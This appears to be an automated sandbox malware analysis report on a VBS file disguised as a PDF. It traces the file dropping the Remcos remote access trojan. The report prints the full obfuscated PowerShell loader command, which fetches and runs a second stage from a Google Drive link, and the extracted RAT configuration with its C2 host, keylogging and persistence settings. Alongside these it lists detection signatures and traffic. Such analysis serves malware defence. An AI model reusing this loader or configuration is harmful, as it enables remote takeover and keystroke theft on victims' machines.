aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholt

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:47:18.943896+020028032702Potentially Bad Traffic192.168.2.949709216.58.206.78443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for submitted file
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsVirustotal: Detection: 8%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1838938605.0000000006E0D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: a458386d9.duckdns.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 216.58.206.78:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000004.00000002.1844919840.0000000006F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.000002918180D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
              Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/o
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7P
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7XR
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.0000000007480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download
              Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download
              Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1508363745.0000029180E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.9:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.9:49710 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_8036.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$SJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C5C0222_2_00007FF886C5C022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C5B2762_2_00007FF886C5B276
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042FF3204_2_042FF320
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042FFBF04_2_042FFBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_042FEFD84_2_042FEFD8
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6992
              Source: unknownProcess created: Commandline size = 6992
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6992Jump to behavior
              Source: amsi32_8036.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Forsvarsministers.ScaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksokqut4.z4a.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7796
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8036
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbsVirustotal: Detection: 8%
